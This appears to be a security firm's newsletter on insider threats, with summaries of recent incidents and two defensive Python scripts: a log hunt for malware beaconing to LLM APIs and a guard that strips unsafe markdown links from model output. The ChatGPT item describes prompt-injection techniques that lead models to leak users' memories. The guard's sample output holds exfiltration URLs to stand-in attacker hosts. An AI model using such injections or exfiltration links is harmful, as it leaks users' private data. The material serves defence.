#NSBCS.099 - The Erosion of Trust: Insider Threats in Cybersecurity



In cybersecurity, trust is the foundation on which defences are built. It underpins the relationships between organisations, their employees, and the clients who rely on them to protect sensitive data. Yet recent incidents involving rogue insiders have shown how fragile that foundation can be, and how quickly its failure turns into a major breach. As external attackers grow more sophisticated, the most serious danger frequently comes from within: trusted staff turning against their own organisations.

Consider the case of Peter Williams, a former executive at L3Harris's Trenchant cyber division. Williams pleaded guilty to stealing eight zero-day exploits and associated trade secrets and selling them to a Russian broker between 2022 and 2025. Those tools could now help adversaries mount undetected attacks on critical infrastructure. The betrayal damaged national security and undermined confidence in firms entrusted with advanced offensive tooling.

Similarly, at DigitalMint, a Chicago-based firm specialising in ransomware negotiations, former employee Kevin Tyler Martin was indicted for conducting ransomware attacks of his own using the ALPHV/BlackCat strain. Martin allegedly drew on his insider knowledge to hack U.S. companies and demand ransoms while his employer was being paid to resolve exactly those crises. The dual role exposes a serious conflict: people hired to fix threats becoming the ones who cause them. The pattern repeats with Ryan Clifford Goldberg of Sygnia Cybersecurity Services, who stands accused of carrying out real extortions against American entities.

These cases show why trust matters so much: insiders are responsible for a significant share of breaches. At NSB Cyber, we put integrity at the centre of everything we do. As a trusted partner to organisations across many sectors, we uphold rigorous ethical standards and operate transparently. That commitment is what allows us to deliver reliable cybersecurity services, build long-term trust with our clients, and protect their digital assets effectively.

Ultimately, rebuilding trust requires transparency and vigilance. As these rogue actors demonstrate, misplaced trust can have far-reaching consequences and weaken digital security globally. In an era of escalating cyber conflict, trusting carefully is not optional; it is a condition of survival.


What we read this week

  • AI-Powered Malware PROMPTFLUX Rewrites Itself Hourly Using Gemini - Google's Threat Intelligence Group has uncovered an experimental Visual Basic Script malware called PROMPTFLUX, developed by an unknown threat actor, which leverages Google's Gemini AI model to dynamically obfuscate and modify its own code for evasion. The malware's "Thinking Robot" component queries the AI hourly for new evasion techniques, logging responses and saving obfuscated versions in the Windows Startup folder for persistence, while attempting to spread via removable drives and network shares. Although still in development and lacking full network compromise capabilities, PROMPTFLUX represents a shift towards AI-driven metamorphic threats, with similar LLM-powered malware like FRUITSHELL, PROMPTLOCK, and PROMPTSTEAL observed in use by state-sponsored actors from China, Iran, and North Korea for reconnaissance, phishing, and data exfiltration. Defences should focus on monitoring anomalous API interactions and implementing safeguards against prompt injections.
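The defensive advice above (watch for anomalous API interactions) is concrete enough to put into a hunt. The script below is an added example written for this newsletter; it is not code from Google's report or from the malware itself. It walks a web-proxy log and raises a finding whenever a script interpreter such as wscript.exe talks to a public LLM API, or whenever any process calls such an API at a regular cadence (the hourly rhythm the report describes). The six-column log format, the workstation names, the timestamps, the process and destination allowlists and the 5% timing tolerance are all constructed assumptions; only the Gemini API hostname is a real public endpoint.

```python
"""Hunt for hourly LLM-API beaconing from a scripting host in web-proxy logs.

Added example: this is not code from Google's report or from the malware.
The log format, hostnames, process names and timestamps below are constructed
for illustration; only the Gemini API hostname is a real public endpoint.
"""
from collections import defaultdict
from datetime import datetime

# Public LLM API endpoints. Extend per environment; the list is an assumption.
LLM_API_HOSTS = {"generativelanguage.googleapis.com", "api.openai.com"}
# Interpreters that have no legitimate reason to call an LLM API on a workstation.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe"}

# Constructed sample log: "<utc timestamp> <src host> <process> <dst host> <method> <path>"
# WS-117 shows the PROMPTFLUX-style pattern (VBScript host, hourly cadence);
# WS-042 is a browser session with irregular timing and should not be flagged.
SAMPLE_LOG = """\
2025-11-03T08:02:11Z WS-117 wscript.exe generativelanguage.googleapis.com POST /v1beta/models/gemini-pro:generateContent
2025-11-03T08:15:00Z WS-042 chrome.exe api.openai.com POST /v1/chat/completions
2025-11-03T08:17:30Z WS-042 chrome.exe api.openai.com POST /v1/chat/completions
2025-11-03T09:02:14Z WS-117 wscript.exe generativelanguage.googleapis.com POST /v1beta/models/gemini-pro:generateContent
2025-11-03T09:40:00Z WS-042 chrome.exe api.openai.com POST /v1/chat/completions
2025-11-03T10:02:09Z WS-117 wscript.exe generativelanguage.googleapis.com POST /v1beta/models/gemini-pro:generateContent
2025-11-03T10:30:00Z WS-117 wscript.exe updates.example.com GET /check
2025-11-03T11:02:12Z WS-117 wscript.exe generativelanguage.googleapis.com POST /v1beta/models/gemini-pro:generateContent
"""


def parse_log(text):
    """Parse the constructed six-column format into (ts, src, proc, dst, method, path) tuples."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, proc, dst, method, path = line.split(maxsplit=5)
        events.append((datetime.fromisoformat(ts.replace("Z", "+00:00")),
                       src, proc.lower(), dst.lower(), method, path))
    return events


def find_llm_beacons(events, period_s=3600, tolerance=0.05, min_hits=3):
    """Return findings for (src, process, dst) tuples that talk to an LLM API.

    A finding is raised when the caller is a script interpreter (always
    suspicious) or when the requests land at a regular cadence: every gap
    between consecutive requests lies within +/- tolerance of period_s and at
    least min_hits requests were seen. Both together are rated high.
    """
    by_key = defaultdict(list)
    for ts, src, proc, dst, _method, _path in events:
        if dst in LLM_API_HOSTS:
            by_key[(src, proc, dst)].append(ts)

    findings = []
    for (src, proc, dst), stamps in by_key.items():
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        periodic = (len(stamps) >= min_hits
                    and all(abs(g - period_s) <= period_s * tolerance for g in gaps))
        script_host = proc in SCRIPT_HOSTS
        if not (periodic or script_host):
            continue
        findings.append({
            "src": src, "process": proc, "dst": dst, "hits": len(stamps),
            "periodic": periodic, "script_host": script_host,
            "severity": "high" if (periodic and script_host) else "medium",
        })
    return findings


if __name__ == "__main__":
    for finding in find_llm_beacons(parse_log(SAMPLE_LOG)):
        print(finding)
```

On the constructed log only WS-117 is reported, rated high because both signals fire: the caller is wscript.exe and the four requests arrive about an hour apart. The browser's calls to api.openai.com are irregular and come from a process that plausibly talks to such services, so they pass. In production the same logic runs against proxy or DNS telemetry, and the process-name signal is the one to lean on, since a real sample will not keep a tidy hourly schedule once it is detected and rewritten.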

  • Nikkei Reveals Data Breach Affecting 17,000 Via Slack Hack - Japanese media giant Nikkei has reported a data breach originating from hacked employee Slack accounts, impacting over 17,000 individuals. The breach was discovered in September 2025 when infostealer malware on an employee's personal device stole Slack credentials, allowing unauthorised access to internal communications. Compromised data includes names, email addresses, and chat histories, but no journalistic sources or reporting details were affected. Nikkei responded by resetting passwords and notifying Japan's Personal Information Protection Commission voluntarily. This incident highlights the risks of infostealer malware, which has compromised over 270,000 Slack credentials globally. Organisations should implement multi-factor authentication for collaboration tools, perform regular device security audits, and educate staff on phishing to prevent credential theft and subsequent breaches.

  • Europe Experiences Surge in Ransomware and Extortion Attacks - European organisations are facing an escalating cyber threat landscape, with ransomware and extortion attacks accounting for nearly 22% of global victims, according to CrowdStrike's 2025 European Threat Landscape Report. The report notes a 13% increase in dedicated leak site entries targeting Europe, with the UK, Germany, France, Italy, and Spain being the most affected countries. Adversary groups like Scattered Spider have shortened their attack timelines to as little as 24 hours. Sectors such as manufacturing, professional services, technology, industrial engineering, and retail are particularly vulnerable. Prominent ransomware variants include Akira, LockBit, RansomHub, INC, Lynx, and Sinobi, focusing on big-game hunting tactics. Geopolitical events, including Russia's invasion of Ukraine and the Israel-Hamas conflict, have fuelled DDoS attacks, hack-and-leak operations, and defacements. Emerging trends involve AI-enhanced vishing for credential theft, fake CAPTCHA lures, malware-as-a-service, and physical threats like cryptocurrency kidnappings.

  • Hacker Claims Massive Data Breach at University of Pennsylvania - A hacker group has claimed a major breach at the University of Pennsylvania, alleging access to 1.2 million records of students, alumni, and donors via a compromised PennKey SSO account. The attackers gained entry to systems including VPN, Salesforce, Qlik, SAP, and SharePoint, exfiltrating data such as names, birth dates, addresses, net worth estimates, donation histories, and sensitive demographics. They sent mass emails to 700,000 recipients mocking the university's security and have published a 1.7 GB archive online. Penn has involved the FBI and third-party experts in the investigation. The case shows how much damage a single compromised SSO account can do when it fronts so many systems. Affected individuals should monitor for phishing and verify communications directly with the university to avoid further compromise.

  • ChatGPT Vulnerabilities Enable Data Leakage Through Prompt Injections - Tenable researchers have identified seven vulnerabilities in OpenAI's ChatGPT (GPT-4o and GPT-5), allowing indirect prompt injections to leak user data from memories and histories. Attacks include embedding malicious instructions in web pages for summarisation, zero-click injections via searches, one-click links, safety bypasses using Bing trackers, conversation poisoning, markdown hiding, and memory injections. These expand the attack surface of AI-integrated tools, facilitating exfiltration and unauthorised actions. Related threats encompass PromptJacking, Claude pirate, and LatentBreak jailbreaks. AI vendors should enhance safety filters like url_safe to prevent injections, while users and organisations must be cautious with AI interactions to safeguard sensitive information.
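Several of the techniques listed above end the same way: the model is tricked into emitting a markdown image or link whose URL carries the victim's data to an attacker's server, and the client fetches it without a click. The block below is an added example written for this newsletter, not OpenAI's url_safe filter or any of Tenable's proof-of-concept code. It shows the output-side control a deploying organisation can apply regardless of the vendor's filters: every inline markdown link or image in a model response is checked against a host allowlist before rendering, and images are additionally refused any query string or fragment, since those are the data-bearing parts. The allowlist, the hostnames and the sample model response are constructed assumptions.

```python
"""Egress guard for LLM output: neutralise markdown links and images that
could carry user data to an attacker-controlled host.

Added example, not OpenAI's url_safe or any Tenable proof-of-concept. The
allowlist, the hostnames and the sample model output are constructed.
"""
import re
from urllib.parse import urlparse

# Assumption: a per-deployment allowlist of hosts the UI may render links to.
ALLOWED_HOSTS = {"docs.example.com", "support.example.com"}

# Matches inline markdown links and images: optional '!', then [text](url "title").
MD_LINK = re.compile(r'(!?)\[([^\]]*)\]\(([^)\s]+)(?:\s+"[^"]*")?\)')

# Constructed model response after a poisoned page was summarised. The image
# is the zero-click exfiltration channel: rendering it sends the query string
# to the attacker without the user doing anything.
UNTRUSTED_OUTPUT = (
    "Here is the summary you asked for.\n\n"
    "![](https://attacker.example/collect?mem=user%20lives%20in%20Sydney)\n\n"
    "Further reading: [the guide](https://docs.example.com/guide) and "
    "[this page](https://evil.example/x?d=secret)."
)


def url_allowed(url, allowed_hosts=ALLOWED_HOSTS, is_image=False):
    """Only http(s) URLs on allowlisted hosts pass. Images additionally may not
    carry a query string or fragment, because that is where data is smuggled."""
    u = urlparse(url)
    if u.scheme not in ("http", "https") or u.hostname not in allowed_hosts:
        return False
    if is_image and (u.query or u.fragment):
        return False
    return True


def render_safe(markdown, allowed_hosts=ALLOWED_HOSTS):
    """Return (sanitised markdown, list of blocked URLs).

    Blocked links keep their visible text so the answer still reads; blocked
    images are replaced by a placeholder so nothing is fetched.
    """
    blocked = []

    def replace(match):
        bang, text, url = match.group(1), match.group(2), match.group(3)
        if url_allowed(url, allowed_hosts, is_image=bool(bang)):
            return match.group(0)
        blocked.append(url)
        return "[image removed]" if bang else (text or "[link removed]")

    return MD_LINK.sub(replace, markdown), blocked


if __name__ == "__main__":
    safe, blocked = render_safe(UNTRUSTED_OUTPUT)
    print(safe)
    print("blocked:", blocked)
```

Run against the constructed response, the guard strips the attacker's image and the evil.example link while leaving the allowlisted documentation link intact, and it returns the two blocked URLs so they can be logged as an injection attempt. Note what this does not cover: it only sees inline markdown, so a renderer that also resolves reference-style links or raw HTML needs the same check applied at that layer, and it cannot stop a user from retyping a URL the model merely describes in prose.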

